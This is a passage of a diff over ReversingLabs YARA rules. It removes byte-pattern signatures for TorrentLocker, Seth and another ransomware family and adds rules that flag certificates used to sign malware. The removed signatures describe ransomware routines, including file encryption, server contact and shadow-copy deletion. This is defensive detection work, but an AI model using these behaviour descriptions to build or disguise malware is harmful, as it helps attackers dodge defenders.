05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 - } - $encrypt_files_p3 = { - E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A ?? 50 E8 ?? ?? - ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B - 4D ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? - 57 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 8B - 55 ?? 8D 45 ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 50 56 53 FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 56 E9 - ?? ?? ?? ?? 8B F1 8B C2 81 C6 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 72 ?? - 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 90 68 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B 55 ?? 8B 4D - ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 - } - $encrypt_files_p4 = { - 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F - 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? E8 ?? - ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? 57 50 E8 ?? - ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 45 - ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 53 - FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 56 E9 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 0F 1F 84 00 ?? ?? ?? ?? - 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B F0 83 C4 - ?? 85 F6 74 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 - 0F 1F 84 00 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 - ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 FF 75 ?? 56 53 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? - ?? ?? ?? 57 56 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ?? - ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 57 E8 - ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 0F 57 C0 66 0F 13 45 ?? 6A ?? 50 6A ?? 53 FF 15 ?? ?? - ?? ?? 8B 75 ?? 8D 45 ?? 6A ?? 50 FF B6 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? - ?? 50 FF B6 ?? ?? ?? ?? 53 FF D7 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? 6A ?? 6A - ?? 6A ?? FF 35 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D6 85 C0 0F - 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? - ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 8B 45 ?? 03 C0 50 E8 ?? - ?? ?? ?? 8B F0 83 C4 ?? 80 3E ?? 74 ?? 8B 45 ?? 8B CE 85 C0 74 ?? 66 90 C6 01 ?? 8D - 49 ?? 83 E8 ?? 75 ?? 8D 45 ?? 50 56 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF D7 6A ?? 8D 45 ?? 50 8B 45 ?? FF B0 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8B 45 ?? FF B0 ?? ?? ?? ?? 53 FF D7 53 FF 15 ?? ?? ?? - ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 6A ?? 50 FF 75 ?? FF - 15 - } - $remote_connection = { - FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 4D ?? 83 79 ?? ?? 72 ?? - 8B 09 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 51 57 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 - F6 0F 84 ?? ?? ?? ?? 8B 4D ?? 53 83 79 ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? - ?? ?? BB ?? ?? ?? ?? EB ?? 51 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BB - ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 8B C8 6A ?? E8 ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? - ?? 66 89 4D ?? 8D 4D ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8D 4D - ?? 83 E3 ?? E8 ?? ?? ?? ?? F6 C3 ?? 5B 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D - 4D ?? 6A ?? 68 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 0F - 43 45 ?? 50 68 ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F - 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 3D ?? ?? - ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 74 ?? 8B 45 ?? - 85 C0 74 ?? C6 84 05 ?? ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? - ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? - ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 75 ?? 8B 7D - ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 - ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D - ?? ?? 8D 4D ?? 8B 45 ?? 8D 55 ?? 0F 43 4D ?? 8B 75 ?? 03 C1 83 7D ?? ?? 8D 4D ?? 52 - 0F 43 4D ?? 50 51 8B CE E8 ?? ?? ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 41 51 FF 75 ?? 8D 4D - ?? E8 - } - condition: - uint16(0)==0x5A4D and (( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and $remote_connection) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Aidem Media Limited" and pe.signatures[i].serial=="57:fc:55:23:9f:21:f1:39:97:86:09:e3:23:09:71:32" and 1501632000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Torrentlocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Eeefec4308Abe63323600E1608F5E6F2 : INFO FILE { meta: - description = "Yara rule that detects TorrentLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "64bdb0db-ea0c-5a0d-9d3e-db1df86c132b" - date = "2020-07-15" - modified = "2020-07-15" + id = "265f70f4-f8cf-52cf-8d9b-ddfefb8a1b79" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.TorrentLocker.yara#L1-L98" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f1aa523fa95e142b7e421286d26918e3da4bd3e268fef3f98f00820296291bfc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12628-L12646" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "71ab4bd7e85155bfbc1612941c5f15c409629b116258c38b79bd808512df006a" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "TorrentLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $tlocker_ep = { - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 05 E8 ?? ?? ?? ?? 33 C0 C3 - } - $tlocker_contact_server_1 = { - 55 8B EC 83 EC ?? 8D 45 ?? 50 8D 4D ?? 51 B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 21 83 7D - ?? ?? 8B 45 ?? 75 05 8B 10 89 55 ?? 85 C0 74 0F 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 53 56 57 8D 9B ?? ?? ?? ?? - 8B 4D ?? 8D 55 ?? 52 6A ?? BB ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 2C 01 00 00 8B BE - ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 EB 00 00 00 6A ?? 68 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 89 00 00 00 8D 45 ?? 50 8D - 4D ?? 51 6A ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 16 81 4D ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 6A ?? 56 FF - 15 ?? ?? ?? ?? 8B 45 ?? 57 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 38 6A ?? 8D 4D ?? 51 8D 55 ?? 52 68 ?? ?? ?? ?? - 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 10 81 7D ?? ?? ?? ?? ?? 75 07 C7 45 ?? ?? ?? ?? - ?? 8B 3D ?? ?? ?? ?? 56 FF D7 EB 06 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 53 8B F0 FF D7 85 F6 74 06 8B 55 ?? 52 FF D7 8B 75 ?? 8B 0D ?? ?? ?? ?? 33 C0 83 7D ?? ?? 56 - 0F 94 C0 6A ?? 51 8B F8 FF 15 ?? ?? ?? ?? 85 FF 75 10 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 9E FE FF FF 5F 5E 5B 8B E5 5D - C3 - } - $tlocker_contact_server_2_1 = { - 55 8B EC 83 EC ?? 8D 45 ?? 50 8D 4D ?? 51 B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 21 83 7D - ?? ?? 8B 45 ?? 75 05 8B 10 89 55 ?? 85 C0 74 0F 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 53 56 57 8D 9B ?? ?? ?? ?? - 8B 4D ?? 8D 55 ?? 52 6A ?? BF ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 E5 01 00 00 BF ?? - ?? ?? ?? 39 3D ?? ?? ?? ?? 74 11 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B - 9E ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 EB 00 00 00 6A ?? 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 89 00 00 00 8D 45 ?? 50 - 8D 4D ?? 51 6A ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 16 81 4D ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 6A ?? 56 - FF 15 ?? ?? ?? ?? 8B 45 ?? 53 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 38 6A ?? 8D 4D ?? 51 8D 55 ?? 52 68 ?? ?? ?? - ?? 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 10 81 7D ?? ?? ?? ?? ?? 75 07 C7 45 ?? ?? ?? - ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 EB 06 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? - } - $tlocker_contact_server_2_2 = { - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8B D8 FF D6 85 DB 74 06 8B 55 ?? 52 FF D6 8B 75 ?? 33 C0 83 7D ?? ?? 0F 94 C0 8B F8 85 - FF 74 18 8B 0D ?? ?? ?? ?? 89 0D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? EB 5E 8B 15 ?? ?? ?? ?? 3B 15 ?? ?? ?? ?? 75 - 34 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B D1 41 89 0D ?? ?? ?? ?? 85 D2 7E 71 8B 0D ?? ?? ?? ?? 3B C1 73 08 8B C8 89 0D - ?? ?? ?? ?? 2B C1 3D ?? ?? ?? ?? 72 1C A1 ?? ?? ?? ?? 40 83 F8 ?? 7E 05 A1 ?? ?? ?? ?? 8B C8 A3 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 81 3D ?? ?? ?? ?? ?? ?? ?? ?? 75 0B 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 56 6A ?? 50 FF 15 ?? ?? ?? ?? 85 - FF 75 17 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 E5 FD FF FF A3 ?? ?? ?? ?? EB BF 5F 5E 5B 8B E5 5D C3 - } - $tlocker_get_server_data = { - 55 8B EC 83 EC ?? 56 57 33 FF 57 57 8D 45 ?? 50 53 33 F6 FF 15 ?? ?? ?? ?? 85 C0 74 77 8D 49 ?? 8B 4D ?? 03 CF 85 F6 75 - 73 33 C0 85 C9 74 0F 8B 15 ?? ?? ?? ?? 51 50 52 FF 15 ?? ?? ?? ?? 33 C9 85 C0 0F 95 C1 8B F0 8B C1 85 C0 74 33 8B 55 ?? - 8D 4D ?? 51 52 8D 04 37 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 1C 8B 45 ?? 85 C0 74 ?? 6A ?? 6A ?? 8D 4D ?? 51 53 03 F8 FF 15 - ?? ?? ?? ?? 85 C0 75 A0 85 F6 74 10 8B 0D ?? ?? ?? ?? 56 6A ?? 51 FF 15 ?? ?? ?? ?? 5F 33 C0 5E 8B E5 5D C3 - } - $tlocker_remove_shadow_copies = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? A1 ?? ?? ?? ?? 53 57 6A ?? 33 FF 57 50 FF 15 ?? ?? ?? ?? 8B D8 - 3B DF 0F 84 DC 00 00 00 56 8D B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 0A C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 5E B8 ?? ?? ?? ?? 8B D3 2B D0 0F B7 08 66 89 0C - 02 83 C0 ?? 66 3B CF 75 F1 6A ?? 8D 95 ?? ?? ?? ?? 57 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? - 51 8D 95 ?? ?? ?? ?? 52 57 68 ?? ?? ?? ?? 57 57 57 53 57 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 0F FF - 15 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B F8 83 BD ?? ?? ?? ?? ?? 74 0B 8B B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 - 6A ?? 50 FF 15 ?? ?? ?? ?? 5E 8B C7 5F 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 5F 33 CD B8 ?? ?? ?? ?? 5B - E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $tlocker_find_files = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 0D ?? ?? ?? ?? 8B 45 ?? 53 56 57 68 ?? ?? ?? ?? 33 F6 56 51 - 89 85 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 AD 01 00 00 53 56 56 6A ?? 56 FF 15 ?? ?? ?? ?? - 85 C0 0F 88 89 01 00 00 68 ?? ?? ?? ?? 53 53 FF 15 ?? ?? ?? ?? 8B C3 8D 50 ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 85 - C9 75 F5 2B C2 D1 F8 8B F8 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 4D 01 00 00 8D 95 ?? ?? ?? ?? 52 50 FF 15 ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 15 01 00 00 F6 85 ?? ?? ?? ?? ?? 0F 84 EC 00 00 00 B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 - 83 D8 ?? 85 C0 0F 84 AE 00 00 00 B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 - 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 74 74 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B FF - 66 8B 08 83 C0 ?? 66 85 C9 75 F5 2B C2 D1 F8 03 C7 8D 44 00 ?? 85 C0 74 6C 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? - 8B F0 85 F6 74 57 53 8D 4F ?? 51 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 56 56 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 0A C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 52 FF - 15 ?? ?? ?? ?? 85 C0 0F 85 EB FE FF FF 8B 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 50 6A ?? 51 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? - ?? 8B 15 ?? ?? ?? ?? 53 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 8B C6 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and (($tlocker_ep and $tlocker_get_server_data and $tlocker_remove_shadow_copies and $tlocker_find_files) and ($tlocker_contact_server_1 or ($tlocker_contact_server_2_1 and $tlocker_contact_server_2_2))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "YUPITER-STROI, OOO" and (pe.signatures[i].serial=="00:ee:ef:ec:43:08:ab:e6:33:23:60:0e:16:08:f5:e6:f2" or pe.signatures[i].serial=="ee:ef:ec:43:08:ab:e6:33:23:60:0e:16:08:f5:e6:f2") and 1491177600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Seth : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0Ecd460Ce14Bd8Ef2926Da2Cd9A44176 : INFO FILE { meta: - description = "Yara rule that detects Seth ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "001de900-4556-5428-a243-7ec07a7ed05e" - date = "2021-04-02" - modified = "2021-04-02" + id = "94128695-0206-5c04-b792-34400f8ce890" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.Seth.yara#L1-L122" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "72a9d902eea2381f40d42faa7f1686c4ca54d364af0cbd8711697bbc1a235646" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12648-L12664" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "58fa244c125415ef7a3cf0feb79add4db7c84f94c23e5d27e840fb17c18d67ef" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Seth" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8D 85 ?? - ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BA ?? ?? - ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? - BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 - 89 C1 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 48 8B 95 ?? - ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? - 48 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 0D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 48 8B 85 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 - 8B 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA - ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89 - C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 - 8D 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 48 8B 85 - } - $encrypt_files_p2 = { - 48 89 C2 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 8B 85 - ?? ?? ?? ?? 89 C2 E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 48 98 48 89 C1 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 - 63 C8 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 - 8B 95 ?? ?? ?? ?? 48 8D 45 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 48 63 C8 48 8B 95 ?? ?? ?? ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 - 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 - BD ?? ?? ?? ?? ?? 74 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 - 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? - ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? - 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? - ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 